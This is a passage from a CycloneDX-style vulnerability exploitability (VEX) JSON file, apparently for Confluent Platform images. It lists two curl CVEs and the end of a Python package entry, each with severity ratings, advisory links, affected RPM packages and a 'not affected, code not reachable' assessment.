          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6253",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        522
      ],
      "description": "curl might erroneously pass on credentials for a first proxy to a second\nproxy.\n\nThis can happen when the following conditions are true:\n\n1. curl is setup to use specific different proxies for different URL schemes\n2. the first proxy needs credentials\n3. the second proxy uses no credentials\n4. while using the first proxy (using say `http://`), curl is asked to follow\n   a redirect to a URL using another scheme (say `https://`), accessed using a\n   second, different, proxy",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6253"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/29/11"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6253"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6253.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6253.json"
        },
        {
          "url": "https://hackerone.com/reports/3669637"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6253"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6253"
        }
      ],
      "published": "2026-05-13T13:01:56+00:00",
      "updated": "2026-06-17T11:00:33+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-6276",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        319
      ],
      "description": "Using libcurl, when a custom `Host:` header is first set for an HTTP request\nand a second request is subsequently done using the same *easy handle* but\nwithout the custom `Host:` header set, the second request would use stale\ninformation and pass on cookies meant for the first host in the second\nrequest. Leak them.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-6276"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/04/29/13"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-6276"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6276.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-6276.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-2jc6-hc33-hv48"
        },
        {
          "url": "https://hackerone.com/reports/3671818"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-6276"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8227-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-6276"
        }
      ],
      "published": "2026-05-13T13:01:56+00:00",
      "updated": "2026-06-17T11:00:35+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
